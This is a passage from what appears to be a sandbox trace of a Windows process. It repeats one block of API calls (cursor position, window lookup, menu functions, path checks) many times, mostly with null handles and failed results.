param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.532] GetStockObject (i=6) returned 0x1b00018 [0027.532] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.532] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.532] PathFileExistsW (pszPath=0x0) returned 0 [0027.532] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.532] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.532] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.532] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.532] GetMenu (hWnd=0x0) returned 0x0 [0027.532] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.532] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.532] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.532] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.532] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.532] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.532] GetStockObject (i=6) returned 0x1b00018 [0027.532] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.532] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.532] PathFileExistsW (pszPath=0x0) returned 0 [0027.532] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.532] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.532] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.532] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.532] GetMenu (hWnd=0x0) returned 0x0 [0027.532] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.532] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.532] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.532] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.532] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.533] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.533] GetStockObject (i=6) returned 0x1b00018 [0027.533] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.533] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.533] PathFileExistsW (pszPath=0x0) returned 0 [0027.533] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.533] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.533] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.533] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.533] GetMenu (hWnd=0x0) returned 0x0 [0027.533] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x556) returned -1 [0027.533] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.533] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.533] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.533] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.533] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.533] GetStockObject (i=6) returned 0x1b00018 [0027.533] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.533] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.533] PathFileExistsW (pszPath=0x0) returned 0 [0027.533] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.533] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.533] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.533] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.533] GetMenu (hWnd=0x0) returned 0x0 [0027.533] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.533] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.533] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.533] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.533] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.533] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.533] GetStockObject (i=6) returned 0x1b00018 [0027.533] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.533] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.534] PathFileExistsW (pszPath=0x0) returned 0 [0027.534] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.534] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.534] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.534] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.534] GetMenu (hWnd=0x0) returned 0x0 [0027.534] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.534] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.534] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.534] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.534] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.534] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.534] GetStockObject (i=6) returned 0x1b00018 [0027.534] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.534] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.534] PathFileExistsW (pszPath=0x0) returned 0 [0027.534] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.534] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.534] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.534] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.534] GetMenu (hWnd=0x0) returned 0x0 [0027.534] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.534] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.534] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.534] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.534] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.534] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.534] GetStockObject (i=6) returned 0x1b00018 [0027.534] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.534] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.534] PathFileExistsW (pszPath=0x0) returned 0 [0027.534] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.534] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.535] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.535] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.535] GetMenu (hWnd=0x0) returned 0x0 [0027.535] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.535] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.535] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.535] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.535] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.535] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.535] GetStockObject (i=6) returned 0x1b00018 [0027.535] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.535] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.535] PathFileExistsW (pszPath=0x0) returned 0 [0027.535] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.535] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.535] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.535] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.535] GetMenu (hWnd=0x0) returned 0x0 [0027.535] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x380) returned -1 [0027.535] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.535] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.535] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.535] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.535] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.535] GetStockObject (i=6) returned 0x1b00018 [0027.535] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.535] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.535] PathFileExistsW (pszPath=0x0) returned 0 [0027.535] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.535] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.535] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.535] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.535] GetMenu (hWnd=0x0) returned 0x0 [0027.535] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.536] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.536] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.536] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.536] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.536] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.536] GetStockObject (i=6) returned 0x1b00018 [0027.536] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.536] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.536] PathFileExistsW (pszPath=0x0) returned 0 [0027.536] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.536] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.536] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.536] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.536] GetMenu (hWnd=0x0) returned 0x0 [0027.536] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.536] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.536] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.536] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.536] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.536] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.536] GetStockObject (i=6) returned 0x1b00018 [0027.536] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.536] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.536] PathFileExistsW (pszPath=0x0) returned 0 [0027.536] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.536] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.536] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.536] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.536] GetMenu (hWnd=0x0) returned 0x0 [0027.536] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.536] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.536] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.536] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.536] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.537] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.537] GetStockObject (i=6) returned 0x1b00018 [0027.537] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.537] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.537] PathFileExistsW (pszPath=0x0) returned 0 [0027.537] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.537] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.537] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.537] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.537] GetMenu (hWnd=0x0) returned 0x0 [0027.537] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.537] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.537] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.537] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.537] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.537] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.537] GetStockObject (i=6) returned 0x1b00018 [0027.537] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.537] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.537] PathFileExistsW (pszPath=0x0) returned 0 [0027.537] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.537] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.537] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.537] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.537] GetMenu (hWnd=0x0) returned 0x0 [0027.537] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x58d) returned -1 [0027.537] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.537] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.537] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.537] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.537] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.537] GetStockObject (i=6) returned 0x1b00018 [0027.537] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.538] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.538] PathFileExistsW (pszPath=0x0) returned 0 [0027.538] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.538] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.538] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.538] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.538] GetMenu (hWnd=0x0) returned 0x0 [0027.538] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.538] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.538] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.538] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.538] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.538] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.538] GetStockObject (i=6) returned 0x1b00018 [0027.538] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.538] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.538] PathFileExistsW (pszPath=0x0) returned 0 [0027.538] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.538] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.538] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.538] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.538] GetMenu (hWnd=0x0) returned 0x0 [0027.538] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.538] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.538] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.538] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.538] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.538] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.538] GetStockObject (i=6) returned 0x1b00018 [0027.538] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.538] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.538] PathFileExistsW (pszPath=0x0) returned 0 [0027.538] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.538] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.539] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.539] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.539] GetMenu (hWnd=0x0) returned 0x0 [0027.539] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.539] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.539] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.539] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.539] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.539] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.539] GetStockObject (i=6) returned 0x1b00018 [0027.539] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.539] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.539] PathFileExistsW (pszPath=0x0) returned 0 [0027.539] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.539] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.539] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.539] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.539] GetMenu (hWnd=0x0) returned 0x0 [0027.539] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.539] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.539] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.539] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.539] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.539] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.539] GetStockObject (i=6) returned 0x1b00018 [0027.539] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.539] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.539] PathFileExistsW (pszPath=0x0) returned 0 [0027.539] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.539] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.539] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.539] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.539] GetMenu (hWnd=0x0) returned 0x0 [0027.539] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4cb) returned -1 [0027.540] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.540] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.540] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.540] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.540] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.540] GetStockObject (i=6) returned 0x1b00018 [0027.540] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.540] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.540] PathFileExistsW (pszPath=0x0) returned 0 [0027.540] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.540] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.540] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.540] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.540] GetMenu (hWnd=0x0) returned 0x0 [0027.540] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.540] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.540] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.540] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.540] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.540] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.540] GetStockObject (i=6) returned 0x1b00018 [0027.540] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.540] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.540] PathFileExistsW (pszPath=0x0) returned 0 [0027.540] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.540] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.540] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.540] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.540] GetMenu (hWnd=0x0) returned 0x0 [0027.540] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.540] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.540] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.540] GetSubMenu 